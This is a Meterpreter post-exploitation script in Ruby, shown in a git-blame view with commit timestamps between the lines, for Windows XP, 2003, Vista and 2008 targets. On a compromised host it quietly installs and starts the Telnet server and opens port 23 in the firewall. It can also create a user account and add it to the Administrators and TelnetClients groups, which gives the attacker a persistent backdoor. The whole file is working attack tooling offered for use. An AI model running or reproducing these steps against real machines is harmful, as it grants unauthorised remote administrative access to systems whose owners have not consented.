2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2009-03-25 03:13:54 +00:00
|
|
|
#
|
|
|
|
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
|
|
|
#Windows 2008 and Windows XP targets using native windows commands.
|
|
|
|
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
|
|
|
#Verion: 0.1.2
|
2009-01-30 06:18:02 +00:00
|
|
|
#Note: If the Telnet Server is not installed in Vista or win2k8
|
2009-03-25 03:13:54 +00:00
|
|
|
# it will be installed.
|
|
|
|
################## Variable Declarations ##################
|
|
|
|
|
|
|
|
session = client
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
2009-10-26 04:49:01 +00:00
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-e" => [ false, "Enable Telnet Server only." ],
|
|
|
|
"-p" => [ true, "The Password of the user to add." ],
|
|
|
|
"-u" => [ true, "The Username of the user to add." ]
|
|
|
|
)
|
2009-03-25 03:13:54 +00:00
|
|
|
def checkifinst(session)
|
2009-10-26 04:49:01 +00:00
|
|
|
# This won't work on windows 2000 since there is no sc.exe
|
2009-03-25 03:13:54 +00:00
|
|
|
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
if d =~ (/TlntSvr/)
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
end
|
|
|
|
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def insttlntsrv(session)
|
2009-05-15 04:24:20 +00:00
|
|
|
trgtos = session.sys.config.sysinfo
|
2009-01-30 06:18:02 +00:00
|
|
|
if trgtos =~ /(Windows Vista)/
|
|
|
|
if checkifinst(session)
|
|
|
|
print_status("Telnet Service Installed on Target")
|
2009-03-25 03:13:54 +00:00
|
|
|
else
|
2009-03-25 03:29:45 +00:00
|
|
|
print "[*] Installing Telnet Server Service ......"
|
2009-03-25 03:13:54 +00:00
|
|
|
session.response_timeout=90
|
|
|
|
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
sleep(2)
|
|
|
|
prog2check = "pkgmgr.exe"
|
|
|
|
found = 0
|
|
|
|
while found == 0
|
|
|
|
session.sys.process.get_processes().each do |x|
|
|
|
|
found =1
|
|
|
|
if prog2check == (x['name'].downcase)
|
|
|
|
print "."
|
|
|
|
sleep(0.5)
|
|
|
|
found = 0
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
2009-03-25 15:15:56 +00:00
|
|
|
print_status("Finished installing the Telnet Service.")
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def enabletlntsrv(session)
|
|
|
|
tmpout = [ ]
|
|
|
|
cmdout = []
|
|
|
|
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
|
|
|
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
|
|
|
value2 = "Start"
|
|
|
|
begin
|
|
|
|
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
|
|
|
v2 = open_key.query_value(value2)
|
|
|
|
print_status "Setting Telnet Server Services service startup mode"
|
|
|
|
if v2.data != 2
|
|
|
|
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
|
|
|
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
|
|
|
cmmds. each do |cmd|
|
|
|
|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
2009-01-30 06:18:02 +00:00
|
|
|
end
|
2009-03-25 03:13:54 +00:00
|
|
|
else
|
|
|
|
print_status "\tTelnet Server Services service is already set to auto"
|
|
|
|
end
|
2009-10-26 04:49:01 +00:00
|
|
|
# Enabling Exception on the Firewall
|
2009-03-25 03:13:54 +00:00
|
|
|
print_status "\tOpening port in local firewall if necessary"
|
|
|
|
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
rescue::Exception => e
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def addrdpusr(session, username, password)
|
|
|
|
tmpout = [ ]
|
|
|
|
cmdout = []
|
|
|
|
print_status "Setting user account for logon"
|
|
|
|
print_status "\tAdding User: #{username} with Password: #{password}"
|
|
|
|
begin
|
|
|
|
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
print_status "\tAdding User: #{username} to local group TelnetClients"
|
|
|
|
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
print_status "\tAdding User: #{username} to local group Administrators"
|
|
|
|
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
print_status "You can now login with the created user"
|
|
|
|
rescue::Exception => e
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def message
|
|
|
|
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
2009-01-30 06:18:02 +00:00
|
|
|
end
|
|
|
|
def usage
|
2009-10-26 04:49:01 +00:00
|
|
|
print_line("Windows Telnet Server Enabler Meterpreter Script")
|
|
|
|
print_line("Usage: gettelnet -u <username> -p <password>")
|
|
|
|
print_line(@@exec_opts.usage)
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
################## MAIN ##################
|
|
|
|
# Parsing of Options
|
|
|
|
usr = nil
|
|
|
|
pass = nil
|
|
|
|
lport = nil
|
|
|
|
enbl = nil
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-u"
|
|
|
|
usr = val
|
|
|
|
when "-p"
|
|
|
|
pass = val
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
when "-n"
|
|
|
|
lport = val.to_i
|
|
|
|
when "-e"
|
2009-10-26 04:49:01 +00:00
|
|
|
enbl = true
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
}
|
2009-10-26 04:49:01 +00:00
|
|
|
if enbl
|
2009-03-25 03:13:54 +00:00
|
|
|
message
|
|
|
|
insttlntsrv(session)
|
|
|
|
enabletlntsrv(session)
|
|
|
|
|
|
|
|
elsif usr!= nil && pass != nil
|
|
|
|
message
|
|
|
|
insttlntsrv(session)
|
|
|
|
enabletlntsrv(session)
|
|
|
|
addrdpusr(session, usr, pass)
|
|
|
|
|
|
|
|
else
|
|
|
|
usage
|
|
|
|
end
|
|
|
|
|